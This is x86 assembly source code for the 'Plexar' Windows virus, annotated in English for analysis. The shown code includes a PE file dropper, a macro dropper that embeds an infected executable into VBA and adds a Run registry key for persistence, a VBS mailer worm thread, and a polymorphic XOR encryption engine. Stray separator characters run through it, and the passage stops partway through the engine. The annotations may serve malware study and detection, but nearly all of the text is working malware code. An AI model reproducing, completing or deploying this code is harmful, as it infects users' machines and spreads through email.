; SetFilePointer(FHandle, Tama¤o_1, NULL, FILE_BEGIN) + SetEndOfFile:
; final length is the grown size on success, the original size otherwise
XOR EAX, EAX
PUSH EAX
PUSH EAX
PUSH DWO [Tama¤o_1]
PUSH DWO [FHandle]
APICALL SetFilePointer

PUSH DWO [FHandle]
APICALL SetEndOfFile

PUSH DWO [BaseMap]
APICALL UnmapViewOfFile

@PE_CloseMap:

PUSH DWO [MHandle]
APICALL CloseHandle

@PE_Close:

PUSH DWO [FHandle]
APICALL CloseHandle

@PEF:

; Unlink the SEH frame
XOR ECX, ECX
POP DWORD PTR FS:[ECX]
POP ECX

PUSH DWO [Guarda_EIP]               ; restore this instance's own HostBack
POP DWO [HostBack]

POPAD
RET

Infecta_PE ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Este proceso suelta en disco un archivo PE vacio.
|
||
;
|
||
; EBX -> Nombre
|
||
|
||
; Drop a clean (not yet infected) PE file by unpacking the embedded Dropper
; image with _aP_depack_asm (external, aPLib-style depacker) straight into
; a file mapping.
; In:  EBX = file name
; Out: CF set if the file could not be created. On every other path CF is
;      whatever the last API call left; callers (Infecta_Word, Worm_VBS)
;      treat that as success.
; Clobbers: nothing (PUSHAD/POPAD). Writes FHandle_DPE, MHandle_DPE, BaseMap_DPE.
Droppear_PE PROC
PUSHAD

; CreateFileA(name, READ|WRITE, 0, NULL, CREATE_ALWAYS, NORMAL, NULL)
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
PUSH EBX
APICALL CreateFileA
MOV DWO [FHandle_DPE], EAX
INC EAX
JZ @Fin_DPE
DEC EAX

; CreateFileMappingA(h, NULL, PAGE_READWRITE, 0, 32768, NULL) — the file is
; grown to 32 KB for the mapping and truncated to the unpacked size below
XOR EBX, EBX
PUSH EBX
PUSH 32768d
PUSH EBX
PUSH PAGE_READWRITE
PUSH EBX
PUSH EAX
APICALL CreateFileMappingA
MOV DWO [MHandle_DPE], EAX
OR EAX, EAX
JZ @DPE_Cierra

; MapViewOfFile(m, FILE_MAP_WRITE, 0, 0, 32768)
XOR EBX, EBX
PUSH 32768d
PUSH EBX
PUSH EBX
PUSH FILE_MAP_WRITE
PUSH EAX
APICALL MapViewOfFile
MOV DWO [BaseMap_DPE], EAX
OR EAX, EAX
JZ @DPE_CierraMap

; _aP_depack_asm(Dropper, view) — cdecl (caller pops 8); the value left in
; EAX is used as the unpacked length below (inferred from that use)
PUSH EAX
LEA EAX, OFS [Dropper]
PUSH EAX
CALL _aP_depack_asm
ADD ESP, 08h

; SetFilePointer(h, unpacked length, NULL, FILE_BEGIN)
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH EAX
PUSH DWO [FHandle_DPE]
APICALL SetFilePointer

@DPE_DesMapea:

PUSH DWO [BaseMap_DPE]
APICALL UnmapViewOfFile

@DPE_CierraMap:

PUSH DWO [MHandle_DPE]
APICALL CloseHandle

@DPE_Cierra:

; Truncate at the current file position and close
PUSH DWO [FHandle_DPE]
APICALL SetEndOfFile

PUSH DWO [FHandle_DPE]
APICALL CloseHandle

POPAD
RET

@Fin_DPE:

POPAD
STC                                 ; CreateFileA failed
RET

Droppear_PE ENDP
|
||
|
||
; Plain-text author strings embedded in the body. They travel with every
; infected file, so they are usable as a static signature.
DB 00h, 00h
DB "< Virus Plexar (c) Julio/Agosto 2001 - Escrito por LiteSys >"
DB 00h, 00h
DB "[ Hecho en Venezuela ]"
DB 00h, 00h
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Proceso para soltar el virus macro de Word.
|
||
|
||
; Word/Excel macro dropper thread. Working in the Windows directory:
;  1. drops a clean PE under a random 8-letter name + ".$$$" (Macaco) and
;     infects it with Infecta_PE;
;  2. hex-encodes that file and embeds it, 200 characters per line, as VBA
;     string concatenations ("joda = joda + ...") between Virus_Macro and
;     Virus_Macro_2, writing the result to Raxelp_$$$;
;  3. writes Macro_VBS to Plxwrd_vbs and registers that path as value
;     "Plexar" (REG_SZ, 11 bytes) under
;     HKLM\Software\Microsoft\Windows\CurrentVersion\Run via
;     SHLWAPI!SHSetValueA — the persistence artifact to look for.
; In:  DeltaOfs (Pascal argument = the CreateThread parameter) = delta for EBP
; Out: none. Release build ends with ExitThread.
; Requires: WScript_Exe exists and Raxelp_$$$ does not (see @Existe_Archivo
; in Worm_VBS).
Infecta_Word PROC Pascal DeltaOfs:DWORD

PUSHAD

MOV EBP, DeltaOfs

; SEH frame: on a fault control goes to @IW_Fin
CALL @SEH_3

MOV ESP, DWORD PTR [ESP+8h]
JMP @IW_Fin

@SEH_3:

XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP

; Scratch MAX_PATH buffer for the Windows directory; its address is parked
; in the immediate of the PUSH used by VirtualFree
PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
PUSH MAX_PATH
PUSH NULL
APICALL VirtualAlloc
MOV DWO [VFreeZ], EAX
OR EAX, EAX
JZ @IW_Fin

PUSH MAX_PATH
PUSH EAX
APICALL GetWindowsDirectoryA
OR EAX, EAX
JZ @IW_Fin

PUSH DWO [VFreeZ]
APICALL SetCurrentDirectoryA       ; everything below happens in the Windows directory
OR EAX, EAX
JZ @IW_Fin

PUSH MEM_DECOMMIT
PUSH MAX_PATH
PUSH 12345678h
ORG $-4
VFreeZ DD 00000000h
APICALL VirtualFree

LEA EBX, OFS [WScript_Exe]
CALL @Existe_Archivo
JNC @VBS_Fin                        ; no script host; note this is Worm_VBS's exit label

LEA EBX, OFS [Raxelp_$$$]
CALL @Existe_Archivo
JC @IW_Fin                          ; already dropped

; Macaco = 8 random letters 'A'..'Y' + ".$$$" + 00h
; (Random: EBX = range, result in EAX — inferred from use)
LEA EDI, OFS [Macaco]
PUSH 08h
POP ECX
@IW2:
PUSH 25d
POP EBX
CALL Random
ADD EAX, 65d
STOSB
LOOP @IW2

MOV EAX, "$$$."
STOSD
XOR AL, AL
STOSB

; Clean PE dropped and then infected
LEA EBX, OFS [Macaco]
CALL Droppear_PE
JC @IW_Fin

LEA EBX, OFS [Macaco]
CALL Infecta_PE

; CreateFileA(Macaco, READ|WRITE, 0, NULL, OPEN_EXISTING, NORMAL, NULL)
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH OPEN_EXISTING
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
LEA EAX, OFS [Macaco]
PUSH EAX
APICALL CreateFileA
MOV DWO [FHandle_IW], EAX
INC EAX
JZ @IW_Fin
DEC EAX

PUSH NULL
PUSH EAX
APICALL GetFileSize
MOV DWO [Tama¤o_IW], EAX
INC EAX
JZ @IW_CierraFile

; CreateFileMappingA(h, NULL, PAGE_READWRITE, 0, 0, NULL) — whole file
XOR EAX, EAX
PUSH EAX
PUSH EAX
PUSH EAX
PUSH PAGE_READWRITE
PUSH EAX
PUSH DWO [FHandle_IW]
APICALL CreateFileMappingA
MOV DWO [MHandle], EAX
OR EAX, EAX
JZ @IW_CierraFile

; MapViewOfFile(m, READ|WRITE, 0, 0, 0)
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH EBX
PUSH FILE_MAP_READ + FILE_MAP_WRITE
PUSH EAX
APICALL MapViewOfFile
MOV DWO [BaseMap_IW], EAX
OR EAX, EAX
JZ @IW_CierraMap

; Buffer for the hex text: 2 * size + 1000h
PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
MOV EAX, DWO [Tama¤o_IW]
ADD EAX, EAX
ADD EAX, 1000h
PUSH EAX
PUSH NULL
APICALL VirtualAlloc
MOV DWO [Memoria_IW], EAX
OR EAX, EAX
JZ @IW_Fin

; Each file byte -> two hex characters (high nibble first), then a 00h
MOV ECX, DWO [Tama¤o_IW]
MOV EDI, EAX
MOV ESI, DWO [BaseMap_IW]

@Conve:

LODSB
CALL @Hexa
STOSW

LOOP @Conve

XOR EAX, EAX
STOSD

PUSH DWO [BaseMap_IW]
APICALL UnmapViewOfFile

PUSH DWO [MHandle_IW]
APICALL CloseHandle

PUSH DWO [FHandle_IW]
APICALL CloseHandle

; CreateFileA(Raxelp_$$$, READ|WRITE, 0, NULL, CREATE_NEW, NORMAL, NULL)
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_NEW
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
LEA EAX, OFS [Raxelp_$$$]
PUSH EAX
APICALL CreateFileA
MOV DWO [FHandle_IW], EAX
INC EAX
JZ @IW_Fin

DEC EAX
; CreateFileMappingA(h, NULL, PAGE_READWRITE, 0, 131072, NULL)
XOR EBX, EBX
PUSH EBX
PUSH 131072d
PUSH EBX
PUSH PAGE_READWRITE
PUSH EBX
PUSH EAX
APICALL CreateFileMappingA
MOV DWO [MHandle_IW], EAX
OR EAX, EAX
JZ @IW_CierraFile

; MapViewOfFile(m, READ|WRITE, 0, 0, 0)
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH EBX
PUSH FILE_MAP_READ + FILE_MAP_WRITE
PUSH EAX
APICALL MapViewOfFile
MOV DWO [BaseMap_IW], EAX
OR EAX, EAX
JZ @IW_CierraMap

; Output = Virus_Macro ...
MOV EDI, EAX
LEA ESI, OFS [Virus_Macro]
PUSH L_Virus_Macro
POP ECX
REP MOVSB

; ... + the hex text split into 200-character VBA string pieces ...
; EDX counts characters on the current line; AL = 0 is the end-of-text test
MOV ESI, DWO [Memoria_IW]
XOR EDX, EDX
XOR EAX, EAX

@IW_B:

MOVSB
INC EDX
CMP EDX, 200d
JNZ @IW_D

; Close the string, newline, and open the next concatenation line
MOV AL, '"'
STOSB
MOV AX, 0A0Dh
STOSW
MOV EAX, "adoj"
STOSD
MOV EAX, 'j = '
STOSD
MOV EAX, " ado"
STOSD
MOV AX, " +"
STOSW
MOV AL, '"'
STOSB

; joda = joda + "

XOR EAX, EAX
XOR EDX, EDX

@IW_D:

CMP BYTE PTR [ESI], AL
JNZ @IW_B

; Close the last string
MOV AL, '"'
STOSB
MOV AX, 0A0Dh
STOSW

; ... + Virus_Macro_2
LEA ESI, OFS [Virus_Macro_2]
PUSH L_Virus_Macro_2
POP ECX
REP MOVSB

PUSH DWO [BaseMap_IW]
APICALL UnmapViewOfFile

PUSH DWO [MHandle_IW]
APICALL CloseHandle

; Truncate Raxelp_$$$ to the bytes actually written
SUB EDI, DWO [Base Map_IW]
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH EDI
PUSH DWO [FHandle_IW]
APICALL SetFilePointer

PUSH DWO [FHandle_IW]
APICALL SetEndOfFile

PUSH DWO [FHandle_IW]
APICALL CloseHandle

; Release the hex buffer
PUSH MEM_DECOMMIT
MOV EAX, DWO [Tama¤o_IW]
ADD EAX, EAX
ADD EAX, 1000h
PUSH EAX
PUSH DWO [Memoria_IW]
APICALL VirtualFree

; CreateFileA(Plxwrd_vbs, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, NORMAL, NULL)
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_ALWAYS
PUSH EAX
PUSH EAX
PUSH GENERIC_WRITE
LEA EBX, OFS [Plxwrd_vbs]
PUSH EBX
APICALL CreateFileA
MOV DWO [FHandle], EAX
INC EAX
JZ @IW_Fin
DEC EAX

; WriteFile(h, Macro_VBS, Largo_MVBS, &Scriptum, NULL)
XOR EBX, EBX
PUSH EBX
LEA EDX, OFS [Scriptum]
PUSH EDX
PUSH Largo_MVBS
LEA EDX, OFS [Macro_VBS]
PUSH EDX
PUSH EAX
APICALL WriteFile

PUSH DWO [FHandle_IW]
APICALL CloseHandle

; LoadLibraryA("SHLWAPI.DLL") — the CALL over the string pushes its address
CALL @IW_Q
DB "SHLWAPI.DLL", 00h
@IW_Q: APICALL LoadLibraryA
OR EAX, EAX
JZ @IW_Fin

; GetProcAddress(hShlwapi, "SHSetValueA")
CALL @IW_K
DB "SHSetValueA", 00h
@IW_K: PUSH EAX
APICALL GetProcAddress
OR EAX, EAX
JZ @IW_Fin

; SHSetValueA(HKLM, "Software\...\Run", "Plexar", REG_SZ, Plxwrd_vbs, 11)
PUSH 11d
LEA EBX, OFS [Plxwrd_vbs]
PUSH EBX
PUSH REG_SZ
CALL @IW_L
DB "Plexar", 00h
@IW_L: CALL @IW_M
DB "Software\Microsoft\Windows\CurrentVersion\Run", 00h
@IW_M: PUSH HKEY_LOCAL_MACHINE
CALL EAX

@IW_Fin:

; Unlink the SEH frame
XOR ECX, ECX
POP DWORD PTR FS:[ECX]
POP ECX

IF DEBUG

POPAD
RET

ELSE

; Delta parked in the MOV EBX immediate so ExitThread can be reached after POPAD
MOV DWO [GuardaEBP2], EBP
POPAD

MOV EBX, 12345678h
ORG $-4
GuardaEBP2 DD 00000000h

PUSH NULL
CALL [EBX+ExitThread]

RET

ENDIF

@IW_CierraMap:

PUSH DWO [MHandle_IW]
APICALL CloseHandle

@IW_CierraFile:

PUSH DWO [FHandle_IW]
APICALL CloseHandle
JMP @IW_Fin

; Converts a byte to its two-character ASCII hex representation.
; In:  AL = byte
; Out: AL = character for the high nibble, AH = character for the low
;      nibble (so STOSW writes them in reading order). Characters come from
;      Tabla_Hex (table not in this view; presumably "0123456789ABCDEF").
; Preserves ECX, EDI.

@Hexa:

PUSH ECX
PUSH EDI

XOR ECX, ECX
MOV CL, AL
PUSH ECX
SHR CL, 04h
LEA EDI, OFS [Tabla_Hex]
INC CL

; EDI = Tabla_Hex + high nibble (walked one byte at a time)
@@Y:
INC EDI
DEC CL
JNZ @@Y

DEC EDI
MOV AL, BYTE PTR [EDI] ; fetch the digit from the table
POP ECX
AND CL, 0Fh
LEA EDI, OFS [Tabla_Hex]
INC CL

; EDI = Tabla_Hex + low nibble
@@X:
INC EDI
DEC CL
JNZ @@X

DEC EDI
MOV AH, BYTE PTR [EDI] ; fetch the digit from the table
POP EDI
POP ECX

RET 00h

Infecta_Word ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; Mailer thread. In the Windows directory it drops an infected PE under a
; name picked from Nombres_Varios, writes the VBS script Raxelp_vbs as
; Gusano_VBS + "<windir>\<dropper name>" + Gusano_VBS2, and launches the
; script with ShellExecuteA. Artifacts: two new files in the Windows
; directory and a script host process started from the infected program.
; In:  DeltaOfs (Pascal argument = the CreateThread parameter) = delta for EBP
; Out: none. Release build ends with ExitThread.
; Requires: WScript_Exe exists and Raxelp_vbs does not.
Worm_VBS PROC Pascal DeltaOfs:DWORD

PUSHAD

MOV EBP, DeltaOfs

; SEH frame: on a fault control goes to @VBS_Fin
CALL @SEH_4

MOV ESP, DWORD PTR [ESP+8h]
JMP @VBS_Fin

@SEH_4:

XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP

; Scratch MAX_PATH buffer for the Windows directory; its address is parked
; in the immediate of the PUSH used by VirtualFree
PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
PUSH MAX_PATH
PUSH NULL
APICALL VirtualAlloc
MOV DWO [VFreeX], EAX
OR EAX, EAX
JZ @VBS_Fin

PUSH MAX_PATH
PUSH EAX
APICALL GetWindowsDirectoryA
OR EAX, EAX
JZ @VBS_Fin

PUSH DWO [VFreeX]
APICALL SetCurrentDirectoryA       ; everything below happens in the Windows directory
OR EAX, EAX
JZ @VBS_Fin

PUSH MEM_DECOMMIT
PUSH MAX_PATH
PUSH 12345678h
ORG $-4
VFreeX DD 00000000h
APICALL VirtualFree

LEA EBX, OFS [WScript_Exe]
CALL @Existe_Archivo
JNC @VBS_Fin                        ; no script host: give up

LEA EBX, OFS [Raxelp_vbs]
CALL @Existe_Archivo
JC @VBS_Fin                         ; already dropped

; Pick a name: skip Random(10)+1 entries of the 00h-separated Nombres_Varios
; (Random: EBX = range, result in EAX — inferred from use)
PUSH 10d
POP EBX
CALL Random
XCHG ECX, EAX
LEA EDI, OFS [Nombres_Varios]
INC ECX
@VBS1:
XOR AL, AL
SCASB
JNZ @VBS1                           ; to the end of one entry
LOOP @VBS1                          ; ... ECX entries; EDI -> chosen name

; ECX = its length without the terminator
PUSH EDI
@VBS2:
XOR AL, AL
INC ECX
SCASB
JNZ @VBS2
DEC ECX
POP EDI

MOV BY [LargoVBS], CL
MOV DWO [GuardaNom], EDI

; Clean PE dropped under that name, then infected
MOV EBX, EDI
CALL Droppear_PE
JC @VBS_Fin

MOV EBX, DWO [GuardaNom]
CALL Infecta_PE

; CreateFileA(Raxelp_vbs, READ|WRITE, 0, NULL, CREATE_NEW, NORMAL, NULL)
XOR EAX, EAX
PUSH EAX
PUSH FILE_ATTRIBUTE_NORMAL
PUSH CREATE_NEW
PUSH EAX
PUSH EAX
PUSH GENERIC_READ + GENERIC_WRITE
LEA EAX, OFS [Raxelp_vbs]
PUSH EAX
APICALL CreateFileA
MOV DWO [FHandle_WVBS], EAX
INC EAX
JZ @VBS_Fin
DEC EAX

; CreateFileMappingA(h, NULL, PAGE_READWRITE, 0, 4096, NULL)
XOR EBX, EBX
PUSH EBX
PUSH 4096d
PUSH EBX
PUSH PAGE_READWRITE
PUSH EBX
PUSH EAX
APICALL CreateFileMappingA
MOV DWO [MHandle_WVBS], EAX
OR EAX, EAX
JZ @VBS_CierraFile

; MapViewOfFile(m, READ|WRITE, 0, 0, 0)
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH EBX
PUSH FILE_MAP_READ + FILE_MAP_WRITE
PUSH EAX
APICALL MapViewOfFile
MOV DWO [BaseMap_WVBS], EAX
OR EAX, EAX
JZ @VBS_DesMapea

; Script = Gusano_VBS ...
XCHG EDI, EAX
LEA ESI, OFS [Gusano_VBS]
PUSH L_Gusano_VBS
POP ECX
REP MOVSB

; ... + Windows directory + "\" ...
PUSH EDI
PUSH MAX_PATH
PUSH EDI
APICALL GetWindowsDirectoryA
OR EAX, EAX
JZ @VBS_CierraTodo
POP EDI
ADD EDI, EAX
MOV BYTE PTR [EDI], "\"
INC EDI

; ... + dropper name ...
MOV ESI, DWO [GuardaNom]
MOVZX ECX, BY [LargoVBS]
REP MOVSB

; ... + Gusano_VBS2
LEA ESI, OFS [Gusano_VBS2]
PUSH L_Gusano_VBS2
POP ECX
REP MOVSB
SUB EDI, DWO [BaseMap_WVBS]         ; EDI = script length

PUSH DWO [BaseMap_WVBS]
APICALL UnmapViewOfFile

PUSH DWO [MHandle_WVBS]
APICALL CloseHandle

; Truncate the file to the script length
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH EDI
PUSH DWO [FHandle_WVBS]
APICALL SetFilePointer

PUSH DWO [FHandle_WVBS]
APICALL SetEndOfFile

PUSH DWO [FHandle_WVBS]
APICALL CloseHandle

; LoadLibraryA("SHELL32.DLL") — the CALL over the string pushes its address
CALL @VBS3
DB "SHELL32.DLL", 00h
@VBS3: APICALL LoadLibraryA
OR EAX, EAX
JZ @VBS_Fin

; GetProcAddress(hShell32, "ShellExecuteA")
CALL @VBS4
DB "ShellExecuteA", 00h, 5 DUP (90h)
@VBS4: PUSH EAX
APICALL GetProcAddress
OR EAX, EAX
JZ @VBS_Fin

; ShellExecuteA(NULL, NULL, Raxelp_VBS, NULL, NULL, 0) — runs the script
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH EBX
LEA EDX, OFS [Raxelp_VBS]
PUSH EDX
PUSH EBX
PUSH EBX
CALL EAX

@VBS_Fin:

; Unlink the SEH frame
XOR ECX, ECX
POP DWORD PTR FS:[ECX]
POP ECX

IF DEBUG

POPAD
RET

ELSE

; Delta parked in the MOV EBX immediate so ExitThread can be reached after POPAD
MOV DWO [GuardaEBP3], EBP
POPAD

MOV EBX, 12345678h
ORG $-4
GuardaEBP3 DD 00000000h

PUSH NULL
CALL [EBX+ExitThread]
RET

ENDIF

@VBS_CierraTodo:

PUSH DWO [BaseMap_WVBS]
APICALL UnmapViewOfFile

@VBS_DesMapea:

PUSH DWO [MHandle_WVBS]
APICALL CloseHandle

@VBS_CierraFile:

; Truncate at DWO [Scriptum] (value not set in this view) and close
XOR EBX, EBX
PUSH EBX
PUSH EBX
PUSH DWO [Scriptum]
PUSH DWO [FHandle_WVBS]
APICALL SetFilePointer

PUSH DWO [FHandle_WVBS]
APICALL SetEndOfFile

PUSH DWO [FHandle_WVBS]
APICALL CloseHandle

JMP @VBS_Fin

; File-existence test through FindFirstFileA (also used by Infecta_Word).
; In:  EBX = file name
; Out: CF set if the file exists, clear otherwise
; Clobbers: EAX, EBX; patches the VAllocZ immediate

@Existe_Archivo:

PUSH EBX
PUSH PAGE_READWRITE
PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN
PUSH SIZEOF_WIN32_FIND_DATA
PUSH NULL
APICALL VirtualAlloc                ; scratch WIN32_FIND_DATA
MOV DWO [VAllocZ], EAX
OR EAX, EAX
JZ @EA_Negativo
POP EBX

; FindFirstFileA(name, find_data)
PUSH EAX
PUSH EBX
APICALL FindFirstFileA
INC EAX
JZ @EA_Negativo                     ; INVALID_HANDLE_VALUE: not found

DEC EAX
PUSH EAX
APICALL FindClose

PUSH MEM_DECOMMIT
PUSH SIZEOF_WIN32_FIND_DATA
PUSH 12345678h
ORG $-4
VAllocZ DD 00000000h
APICALL VirtualFree

STC
RET 0

@EA_Negativo:

PUSH MEM_DECOMMIT
PUSH SIZEOF_WIN32_FIND_DATA
PUSH DWO [VAllocZ]
APICALL VirtualFree

CLC
RET 0


Worm_VBS ENDP
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
DB "[" XOR 40h
|
||
DB "D" XOR 40h
|
||
DB "e" XOR 40h
|
||
DB "s" XOR 40h
|
||
DB "i" XOR 40h
|
||
DB "g" XOR 40h
|
||
DB "n" XOR 40h
|
||
DB "e" XOR 40h
|
||
DB "d" XOR 40h
|
||
DB " " XOR 40h
|
||
DB "b" XOR 40h
|
||
DB "y" XOR 40h
|
||
DB " " XOR 40h
|
||
DB "L" XOR 40h
|
||
DB "i" XOR 40h
|
||
DB "t" XOR 40h
|
||
DB "e" XOR 40h
|
||
DB "S" XOR 40h
|
||
DB "y" XOR 40h
|
||
DB "s" XOR 40h
|
||
DB "]" XOR 40h
|
||
DB 40h
|
||
|
||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
|
||
; PXPE: Plexar Polymorphic Engine: Another Lame Poly Written By Me.
|
||
;
|
||
; ESI -> Origen
|
||
; EDI -> Destino
|
||
; ECX -> Tama¤o
|
||
|
||
PXPE PROC
|
||
|
||
MOV DWO [Origen], ESI
|
||
MOV DWO [Destino], EDI
|
||
MOV DWO [Tama¤o], ECX
|
||
|
||
CALL @Inicializar_Semillas
|
||
|
||
XOR EBX, EBX
|
||
DEC EBX
|
||
CALL @Aleatorio
|
||
MOV DWO [Llave], EAX
|
||
|
||
MOV EDI, DWO [Destino]
|
||
|
||
; DELTA
|
||
|
||
PUSH EDI
|
||
CALL @Basura
|
||
CALL @Basura
|
||
POP EDX
|
||
SUB EDX, EDI
|
||
MOV DWO [GuardaDelta2], EDX
|
||
|
||
MOV AL, 0E8h ; CALL
|
||
STOSB
|
||
XOR EAX, EAX ; Delta
|
||
STOSD
|
||
CALL @Basura
|
||
CALL @Basura
|
||
CALL @Popear_Delta
|
||
CALL @Basura
|
||
CALL @Basura
|
||
CALL @Meter_Tama¤o
|
||
CALL @Basura
|
||
CALL @Basura
|
||
|
||
CALL @Colocar_Lea
|
||
CALL @Basura
|
||
MOV DWO [GuardaLoop], EDI
|
||
CALL @Basura
|
||
|
||
MOV AX, 03781h ; XOR DWORD PTR [EDI]
|
||
STOSW
|
||
MOV EAX, DWO [Llave]
|
||
STOSD
|
||
CALL @Basura
|
||
CALL @Basura
|
||
CALL @SumaCuatro
|
||
CALL @Basura
|
||
CALL @Basura
|
||
|
||
MOV AL, 049h
|
||
STOSB
|
||
MOV AX, 850Fh
|
||
STOSW
|
||
MOV EAX, DWO [GuardaLoop]
|
||
SUB EAX, EDI
|
||
SUB EAX, 04h
|
||
STOSD
|
||
|
||
CALL @Basura
|
||
CALL @Basura
|
||
|
||
MOV EAX, EDI
|
||
SUB EAX, DWO [Destino]
|
||
SUB EAX, 05h
|
||
MOV EBX, DWO [GuardaDelta]
|
||
SUB DWORD PTR [EBX], EAX
|
||
MOV EDX, DWO [GuardaDelta2]
|
||
SUB DWORD PTR [EBX], EDX
|
||
|
||
MOV ESI, DWO [Origen]
|
||
MOV ECX, DWO [Tama¤o]
|
||
MOV EAX, DWO [Llave]
|
||
|
||
@ReCopia:
|
||
MOVSD
|
||
XOR DWORD PTR [EDI-4h], EAX
|
||
LOOP @ReCopia
|
||
|
||
RET
|
||
|
||
@Inicializar_Semillas:
|
||
|
||
LEA EDI, OFS [@SaveSemilla]
|
||
RDTSC
|
||
STOSD
|
||
PUSH 04h
|
||
POP EDI
|
||
LEA ESI, OFS [@SaveSemilla]
|
||
CALL CRC32
|
||
MOV DWO [Semilla_1], EAX
|
||
|
||
APICALL GetTickCount
|
||
ADD EAX, EAX
|
||
NOT EAX ; que mierda...
|
||
PUSH 04h
|
||
POP EDI
|
||
LEA ESI, OFS [@SaveSemilla]
|
||
CALL CRC32
|
||
MOV DWO [Semilla_2], EAX
|
||
|
||
RET
|
||
|
||
; Un indecente generador de numeros aleatorios...
|
||
;
|
||
; EBX -> Limite.
|
||
|
||
; Pseudo-random number in [0, EBX).
; Two linear congruential generators (Semilla_1 / Semilla_2, constants
; Mierda_1..Mierda_4 declared at the end of PXPE, seeded in
; @Inicializar_Semillas) are stepped once, their 8 bytes are written to
; Milonga, CRC32'ed, and the CRC is reduced modulo EBX.
;   In:  EBX = exclusive upper bound (must be non-zero: DIV EBX faults on 0)
;   Out: EAX = value in [0, EBX)
;   Preserves EBX, ECX, EDX, EDI. Clobbers ESI (CRC32's LODSB leaves it
;   at Milonga+8) and flags; DF is cleared by CRC32.
;   Not a security-grade generator: the state is two 32-bit LCGs mixed
;   through CRC32.
@Aleatorio:

PUSH EDI
PUSH ECX
PUSH EDX
PUSH EBX

MOV EAX, DWO [Semilla_1]
IMUL EAX, Mierda_1              ; LCG step: s1 = s1 * Mierda_1 + Mierda_2
ADD EAX, Mierda_2
MOV DWO [Semilla_1], EAX

LEA EDI, OFS [Milonga]
STOSD                           ; Milonga[0..3] = s1

MOV EBX, DWO [Semilla_2]
IMUL EBX, Mierda_3              ; LCG step: s2 = s2 * Mierda_3 + Mierda_4
ADD EBX, Mierda_4
MOV DWO [Semilla_2], EBX
XCHG EAX, EBX
STOSD                           ; Milonga[4..7] = s2

LEA ESI, OFS [Milonga]
PUSH 08h
POP EDI                         ; EDI = byte count for CRC32
CALL CRC32                      ; EAX = CRC32(Milonga, 8)

POP EBX                         ; the caller's limit
XOR EDX, EDX
DIV EBX                         ; EDX = CRC mod limit

XCHG EDX, EAX                   ; return the remainder in EAX

POP EDX
POP ECX
POP EDI

RET

Milonga DB 9 DUP (00h)
|
||
|
||
@Popear_Delta:
|
||
|
||
PUSH 04h
|
||
POP EBX
|
||
CALL @Aleatorio
|
||
OR EAX, EAX
|
||
JZ @Popear_Delta_I
|
||
CMP EAX, 01h
|
||
JZ @Popear_Delta_II
|
||
CMP EAX, 02h
|
||
JZ @Popear_Delta_III
|
||
CMP EAX, 03h
|
||
JZ @Popear_Delta_IV
|
||
|
||
JMP @Popear_Delta_IV
|
||
|
||
@Popear_Delta_R:
|
||
|
||
RET
|
||
|
||
@Popear_Delta_I:
|
||
MOV AL, 05Dh ; POP EBP
|
||
STOSB
|
||
MOV AX, 0ED81h ; SUB EBP
|
||
STOSW
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
JMP @Popear_Delta_R
|
||
|
||
@Popear_Delta_II:
|
||
MOV AL, 058h
|
||
STOSB
|
||
MOV AL, 02Dh
|
||
STOSB
|
||
MOV DWO [GuardaDelta], EDI
|
||
MOV EAX, DWO [Origen]
|
||
STOSD
|
||
MOV AL, 095h
|
||
STOSB
|
||
JMP @Popear_Delta_R
|
||
|
||
@Popear_Delta_III:
|
||
